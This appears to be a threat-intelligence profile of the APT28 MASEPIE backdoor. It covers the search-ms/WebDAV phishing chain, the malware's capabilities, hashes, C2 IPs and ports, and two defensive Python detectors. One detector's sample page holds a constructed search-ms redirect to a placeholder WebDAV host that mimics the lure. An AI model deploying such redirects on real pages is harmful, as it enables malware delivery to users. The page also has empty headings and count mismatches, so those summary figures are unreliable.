MASEPIE
MASEPIE is a malicious Python-based downloader/backdoor associated with Russian GRU Unit 26165, widely tracked as APT28/Fancy Bear. Public reporting describes it as a previously unseen malware family used in espionage campaigns targeting Ukrainian government organizations, entities in Ukraine and Poland, French organizations, and Western logistics and technology companies involved in supporting aid delivery to Ukraine. It has also been referenced alongside other APT28 tooling including HEADLACE, STEELHOOK, and OCEANMAP.
Reported delivery methods include spearphishing emails, some sent from previously compromised accounts, and malicious landing pages that abuse the Windows search: protocol handler together with WebDAV-hosted staging. In one documented chain, victims were lured to DriveHQ-hosted firstcloudit[.]com subdomains whose JavaScript invoked a Microsoft search: URI that retrieved remote .search-ms files over WebDAV. These files exposed malicious LNK or ZIP payloads; opening the LNK launched a decoy document, downloaded a Python interpreter, and executed the MASEPIE payload. MASEPIE has also been cited in broader APT28 spearphishing and malware-delivery operations, including campaigns exploiting CVE-2023-38831 in WinRAR.
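As an added example (not code from the cited reports or from the campaign), a defender-side check for the landing-page technique above: it scans HTML or email body text for Windows Search protocol handler URIs (search: and search-ms:) that point at a remote location or a .search-ms file, which is what distinguishes this lure from an ordinary local search link. The sample page, the 203.0.113.10 host and the parameter names in it are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Windows Search protocol handler URIs (search: and search-ms:) wherever they appear
# in HTML attributes or inline JavaScript strings.
SEARCH_URI = re.compile(r"""(?i)\bsearch(?:-ms)?:[^\s"'<>)]+""")
# A UNC path (\\host\...), an http(s) URL, the WebDAV @SSL marker or a .search-ms file
# inside the URI means the handler would display content from a remote server.
# Two-or-more backslashes are accepted so JS-escaped strings are caught as well.
REMOTE_TARGET = re.compile(r"(?i)(\\\\+[\w.\-\[\]:]+\\+|https?://|@ssl\b|\.search-ms\b)")

def find_search_handler_abuse(content: str):
    """Return findings for search:/search-ms: URIs that reference a remote location
    or a .search-ms file; ordinary local searches are not reported."""
    findings = []
    for m in SEARCH_URI.finditer(content):
        uri = unquote(m.group(0))  # undo URL escaping before inspecting the target
        hit = REMOTE_TARGET.search(uri)
        if hit:
            findings.append({"uri": uri, "remote_indicator": hit.group(0)})
    return findings

# Constructed landing page; the host, share and parameter names are placeholders.
SAMPLE_PAGE = r"""<html><body>
<script>
  window.location.href = "search-ms:query=invoice&src=\\\\203.0.113.10\\webdav\\wody.search-ms";
</script>
<a href="search:q=meeting notes">search my documents</a>
</body></html>"""

if __name__ == "__main__":
    for f in find_search_handler_abuse(SAMPLE_PAGE):
        print(f["remote_indicator"], "in", f["uri"])
```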
Functionally, MASEPIE has been described as a Python downloader and as a malicious Python script enabling elementary remote command execution and file exchange with infected systems. Documented capabilities include executing arbitrary shell commands via Python os.popen, responding to a check command with check-ok, sending files, retrieving files, and supporting persistence/data-exfiltration workflows in APT28 campaigns. Reporting also states APT28 used MASEPIE to load PowerShell scripts named STEELHOOK/Steelhook to steal Chrome or Chromium-based browser data, which was then sent to command-and-control infrastructure.
In the CERT-UA-linked December 2023 campaign, a referenced MASEPIE sample named Client.py had SHA-256 18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6. MASEPIE communicated with C2 over two raw TCP channels on high or non-standard ports, with examples including 54763 and 55555. Traffic was encrypted with AES-128-CBC using a randomly generated 16-character ASCII key transmitted in cleartext at session start. Some samples also performed HTTP beaconing to Interactsh infrastructure on oast[.]fun, and one reported sample with SHA-256 a333243927bb6956dc051ecea5f91b26a6c233b8164fafb9202e1f1e70ce045f displayed a decoy document on execution. Additional campaign artifacts included malicious .search-ms files such as mod.search-ms, calendar.search-ms, wody.search-ms, and pol.search-ms; a malicious LNK with SHA-256 19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc; shared CSS file SHA-256 2328921cd1ec88aa3dec45c3367782b7760f6a7aa615b15feaad2e34e206e2f0; decoy URL http://194.126.178[.]8/webdav/wody.pdf; and infrastructure including 194.126.178[.]8, 124.168.91[.]178, 159.196.128[.]120, and 172.114.170[.]18.
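An added example, not code from any of the cited reports: a flow-level heuristic for the C2 pattern just described. It scores each source/destination pair on the published C2 addresses and ports, on two or more raw TCP sessions to one host on high ports, and on a first client payload of exactly 16 printable bytes followed by 16-byte-aligned records (the cleartext AES-128 key and the CBC ciphertext that follows it). The flow schema, the 10000 high-port threshold and the sample flows are assumptions made for this example.

```python
import string
from collections import defaultdict

# Indicators quoted in the profile above (defanged there, plain here for matching).
KNOWN_C2_IPS = {"194.126.178.8", "124.168.91.178", "159.196.128.120", "172.114.170.18"}
KNOWN_C2_PORTS = {54763, 55555}
HIGH_PORT = 10000   # assumption: our threshold for a "high" destination port
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation)
def looks_like_key_exchange(first_payload: bytes) -> bool:
    """16 printable ASCII bytes first: the cleartext AES-128 key MASEPIE sends at session start."""
    return len(first_payload) == 16 and all(chr(b) in PRINTABLE for b in first_payload)

def score_flows(flows):
    """Return [(src, dst, reasons)] for host pairs whose TCP flows resemble MASEPIE C2.
    Flow dicts use a constructed schema: src, dst, dport, first_client_payload (bytes)
    and later_payload_sizes (lengths of the records exchanged after the key)."""
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"])].append(f)
    findings = []
    for (src, dst), fl in by_pair.items():
        reasons = []
        if dst in KNOWN_C2_IPS:
            reasons.append("destination is a published MASEPIE C2 address")
        if any(f["dport"] in KNOWN_C2_PORTS for f in fl):
            reasons.append("port matches a reported MASEPIE C2 port")
        if sum(f["dport"] >= HIGH_PORT for f in fl) >= 2:
            reasons.append("two or more raw TCP sessions on high ports to one host")
        keyed = [f for f in fl if looks_like_key_exchange(f["first_client_payload"])]
        # AES-CBC ciphertext is always a multiple of the 16-byte block size.
        if keyed and all(n % 16 == 0 for f in keyed for n in f["later_payload_sizes"]):
            reasons.append("16 printable bytes at session start, then 16-byte-aligned records")
        if len(reasons) >= 2:   # require two independent signals before alerting
            findings.append((src, dst, reasons))
    return findings

SAMPLE_FLOWS = [  # constructed telemetry, not captured traffic
    {"src": "10.0.0.5", "dst": "203.0.113.7", "dport": 54763,
     "first_client_payload": b"Zq8kL2mNp4vR7sT1", "later_payload_sizes": [32, 48, 16]},
    {"src": "10.0.0.5", "dst": "203.0.113.7", "dport": 55555,
     "first_client_payload": b"hB3$wE9xQ1!uY6cD", "later_payload_sizes": [64]},
    {"src": "10.0.0.9", "dst": "198.51.100.2", "dport": 443,  # ordinary TLS ClientHello
     "first_client_payload": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc" + b"\x00" * 7,
     "later_payload_sizes": [517, 90]},
]

if __name__ == "__main__":
    for src, dst, why in score_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: " + "; ".join(why))
```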
Multiple reports state the surrounding infrastructure for these operations relied heavily on compromised SOHO or Ubiquiti/EdgeOS devices, providing staging, phishing, and relay capability. High-confidence victim sectors mentioned in the content include government, defense-related organizations, logistics, transportation, IT services, and technology companies, particularly those connected to Ukraine support operations.
Vulnerabilities exploited
Two CVEs have been correlated with this family across public research and vendor advisories.
The Russian GRU cyber campaign also involves malware such as HEADLACE and MASEPIE, which are used for persistence and data exfiltration.
Groups observed using it
Two distinct threat actors have been attributed by public researchers.
In December 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) reported that Russian state cyber unit APT28 was targeting entities in Ukraine and Poland with phishing campaigns in an attempt to leverage previously unseen malware. APT28 used MASEPIE to load PowerShell scripts called Steelhook to steal Chrome browser-based data, which APT28 sent to its C2 server.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (5 techniques)
"those protocol handlers can be leveraged to trigger the display of remote files made available through a WebDAV server"
A significant aspect of the campaign involves the exploitation of known vulnerabilities. The actors have weaponized multiple CVEs, including:
- CVE-2023-23397 in Microsoft Outlook to harvest credentials
- Roundcube vulnerabilities for email server access
- CVE-2023-38831 in WinRAR for remote code execution
In December 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) reported that Russian state cyber unit APT28 was targeting entities in Ukraine and Poland with phishing campaigns... On September 4, 2023, CERT-UA reported a phishing campaign in which BlueDelta leveraged Headlace information-stealing malware to target critical energy infrastructure in Ukraine.
Execution (7 techniques)
To establish persistence on the infected system, MASEPIE loaded a backdoor called OCEANMAP that allowed for discreet command execution.
"a Python interpreter and a malicious payload script (MASEPIE) would be downloaded and executed"
The actors have weaponized multiple CVEs, including: CVE-2023-23397 in Microsoft Outlook to harvest credentials ... CVE-2023-38831 in WinRAR for remote code execution
Persistence (1 technique)
Credential Access (1 technique)
Collection (1 technique)
Command and Control (5 techniques)
"trigger the display of remote files made available through a WebDAV server"
"Ubiquiti networks devices are being used as malicious infrastructure to stage infection files, and as command and control servers or reverse-proxies."
"MASEPIE uses two raw TCP connections to a command and control (C2) server on non-standard and high TCP ports"
Recent activity
Eight sources tracked across advisories, community write-ups, and news:
A short-lived Python downloader used as part of APT28's fragmented single-purpose toolkit.
Malware used in the campaign for persistence and data exfiltration.
Malware used by APT28 to load PowerShell scripts in a phishing campaign targeting entities in Ukraine and Poland.
MASEPIE is a malware used by APT28, designed for espionage and data exfiltration from targeted organizations.